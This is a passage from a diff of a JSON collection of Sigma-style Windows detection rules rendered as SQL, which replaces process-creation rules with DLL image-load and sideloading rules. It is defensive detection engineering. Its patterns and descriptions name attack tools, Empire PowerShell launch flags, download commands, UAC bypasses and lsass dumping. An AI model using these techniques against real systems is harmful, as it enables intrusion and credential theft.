LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_hktl_invoke_obfuscation_via_var.yml" + "filename": "image_load_uac_bypass_iscsicpl.yml" }, { - "title": "PUA - Nmap/Zenmap Execution", - "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "title": "Time Travel Debugging Utility Usage - Image", + "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", "status": "test", - "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Network administrator computer" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_nmap_zenmap.yml" + "filename": "image_load_tttracer_mod_load.yml" }, { - "title": "Suspicious RASdial Activity", - "id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", - "status": "test", - "description": "Detects suspicious process related to rasdial.exe", - "author": "juju4", + "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", + "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "status": "experimental", + "description": "Detects cmstp loading \"dll\" or \"ocx\" files 
from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.t1218.003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%rasdial.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rasdial_execution.yml" + "filename": "image_load_cmstp_load_dll_from_susp_location.yml" }, { - "title": "Add User to Local Administrators Group", - "id": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", - "status": "experimental", - "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "GAC DLL Loaded Via Office Applications", + "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "status": "test", + "description": "Detects any GAC DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Administrative activity" + "Legitimate macro usage. 
Add the appropriate filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '% administrators %' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_add_user_local_admin_group.yml" + "filename": "image_load_office_dotnet_gac_dll_load.yml" }, { - "title": "Suspicious Msiexec Quiet Install", - "id": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", - "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "author": "frack113", + "title": "WMIC Loading Scripting Libraries", + "id": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", + "status": "test", + "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1218.007" + "attack.t1220" ], 
"falsepositives": [ - "Legitimate script" + "The command wmic os get lastboottuptime loads vbscript.dll", + "The command wmic os get locale loads vbscript.dll", + "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe' ESCAPE '\\' AND IntegrityLevel = 'System')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\jscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_install_quiet.yml" + "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml" }, { - "title": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE", - "id": "01c42d3c-242d-4655-85b2-34f1739632f7", + "title": "Potential DLL Sideloading Via JsSchHlp", + "id": "68654bf0-4412-43d5-bfe8-5eaa393cd939", "status": "experimental", - "description": "Detects usage of Dsacls to grant over permissive permissions", - 
"author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1218" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate administrators granting over permissive permissions to users" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND CommandLine LIKE '% /G %' ESCAPE '\\' AND (CommandLine LIKE '%GR%' ESCAPE '\\' OR CommandLine LIKE '%GE%' ESCAPE '\\' OR CommandLine LIKE '%GW%' ESCAPE '\\' OR CommandLine LIKE '%GA%' ESCAPE '\\' OR CommandLine LIKE '%WP%' ESCAPE '\\' OR CommandLine LIKE '%WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\JSESPR.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\Justsystem\\\\JsSchHlp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsacls_abuse_permissions.yml" + "filename": "image_load_side_load_jsschhlp.yml" }, { - "title": "Permission Check Via Accesschk.EXE", - "id": "c625d754-6a3d-4f65-9c9a-536aea960d37", + "title": "Svchost DLL Search Order Hijack", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", "status": "test", - "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on 
files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "author": "SBousseaden", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%AccessChk' ESCAPE '\\' OR Description LIKE '%Reports effective permissions%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk64.exe' ESCAPE '\\') OR OriginalFileName = 'accesschk.exe') AND (CommandLine LIKE '%uwcqv %' ESCAPE '\\' OR CommandLine LIKE '%kwsu %' ESCAPE '\\' OR CommandLine LIKE '%qwsu %' ESCAPE '\\' OR CommandLine LIKE '%uwdqs %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_accesschk_check_permissions.yml" + "filename": "image_load_side_load_svchost_dlls.yml" }, { - "title": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", - "id": "c8a180d6-47a3-4345-a609-53f9c3d834fc", + "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", + "id": "48bfd177-7cf2-412b-ad77-baf923489e82", "status": "experimental", - "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", - "author": "Nasreddine Bencherchali (Nextron 
Systems)", - "tags": [ - "attack.discovery", - "attack.t1087.001" - ], - "falsepositives": [ - "Administrative activity" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Get-LocalGroupMember %' ESCAPE '\\' AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_powershell_get_localgroup_member_recon.yml" - }, - { - "title": "Blue Mockingbird", - "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", - "status": "test", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 
'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_blue_mockingbird.yml" + "filename": "image_load_dll_vsstrace_susp_load.yml" }, { - "title": "HackTool - Empire PowerShell Launch Parameters", - "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "status": "test", - "description": "Detects suspicious powershell command line parameters used in Empire", + "title": "HackTool - SharpEvtMute DLL Load", + "id": "49329257-089d-46e6-af37-4afce4290685", + "status": "experimental", + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Other tools that incidentally use the same command line parameters" + "Other DLLs with the same Imphash" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b')" ], - "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" + "filename": 
"image_load_hktl_sharpevtmute.yml" }, { - "title": "Perl Inline Command Execution", - "id": "f426547a-e0f7-441a-b63e-854ac5bdf54d", + "title": "UIPromptForCredentials DLLs", + "id": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", "status": "experimental", - "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. This is could be used as a way to launch a reverse shell or execute live perl code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.collection", + "attack.t1056.002" ], "falsepositives": [ - "Unknown" + "Other legitimate processes loading those DLLs in your environment." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\perl.exe' ESCAPE '\\' OR OriginalFileName = 'perl.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wincredui.dll' ESCAPE '\\') OR OriginalFileName IN ('credui.dll', 'wincredui.dll')) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' 
AND (NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\regedit.exe' ESCAPE '\\') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND CommandLine LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\SpotifyAB.SpotifyMusic\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_perl_inline_command_execution.yml" + "filename": "image_load_uipromptforcreds_dlls.yml" }, { - "title": "HackTool - Hydra Password Bruteforce Execution", - "id": "aaafa146-074c-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects command line parameters used by Hydra password guessing hack tool", - "author": "Vasiliy Burov", + "title": "Potential Rcdll.DLL Sideloading", + "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", + "status": "experimental", + "description": "Detects potential DLL sideloading of rcdll.dll", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Software that uses the caret encased keywords PASS and USER in its command line" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files 
(x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_hydra.yml" + "filename": "image_load_side_load_rcdll.yml" }, { - "title": "Suspicious Download from Office Domain", - "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", + "title": "Web Browsers DLL Sideloading", + "id": "72ca7c75-bf85-45cd-aca7-255d360e423c", "status": "experimental", - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of web browsers", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], "falsepositives": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\chrome\\_frame\\_helper.dll' ESCAPE '\\' AND NOT 
(ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_download_office_domain.yml" + "filename": "image_load_side_load_web_browsers.yml" }, { - "title": "Suspicious Rundll32 Without Any CommandLine Params", - "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "title": "DLL Sideloading Of DBGHELP.DLL", + "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Possible but rare" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR 
ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rundll32_no_params.yml" + "filename": "image_load_side_load_dbghelp_dll.yml" }, { - "title": "HackTool - Windows Credential Editor (WCE) Execution", - "id": "7aa7009a-28b9-4344-8c1f-159489a390df", + "title": "Active Directory Kerberos DLL Loaded Via Office Application", + "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Kerberos DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Another service that uses a single -s command line switch" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\clussvc.exe' 
ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_wce.yml" + "filename": "image_load_office_kerberos_dll_load.yml" }, { - "title": "Gpscript Execution", - "id": "1e59c230-6670-45bf-83b0-98903780607e", + "title": "DLL Sideloading Of ShellChromeAPI.DLL", + "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "status": "experimental", - "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", - "author": "frack113", + "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". 
One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate uses of logon scripts distributed via group policy" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gpscript.exe' ESCAPE '\\' OR OriginalFileName = 'GPSCRIPT.EXE') AND (CommandLine LIKE '% /logon%' ESCAPE '\\' OR CommandLine LIKE '% /startup%' ESCAPE '\\'))" + "SELECT * FROM logs 